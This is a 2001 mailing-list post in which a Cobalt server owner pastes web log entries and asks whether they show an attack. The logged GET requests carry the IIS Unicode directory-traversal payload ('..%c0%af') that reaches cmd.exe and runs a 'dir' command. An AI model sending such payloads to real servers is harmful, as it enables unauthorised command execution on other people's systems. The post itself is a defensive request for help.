[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] Odd log code, Hack attempt?
- Subject: [cobalt-security] Odd log code, Hack attempt?
- From: "Rodrigo Velasco" <rvelasco@xxxxxxx>
- Date: Sat, 7 Apr 2001 18:48:29 -0400
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hi again,
I've found the following lines in my last log from my Cobalt4i, I don't
really know if it means something important, but looks to me how somebody
was trying to use a sort of script on my server:
ns.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
ns2.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
www.customer.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 310 "-" "-"
www.anothercustomer.com 207.175.129.160 - - [07/Apr/2001:06:50:04 -0400]
"GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 306 "-" "-"
ns.mydomain.com 127.0.0.1 - - [07/Apr/2001:07:00:01 -0400] "HEAD / HTTP" 200
0 "-" "-"
I'll appreciate if anybody of you could tell me what does it mean and what
could I do to avoid risk my server.
Regards,
Rodrigo Velasco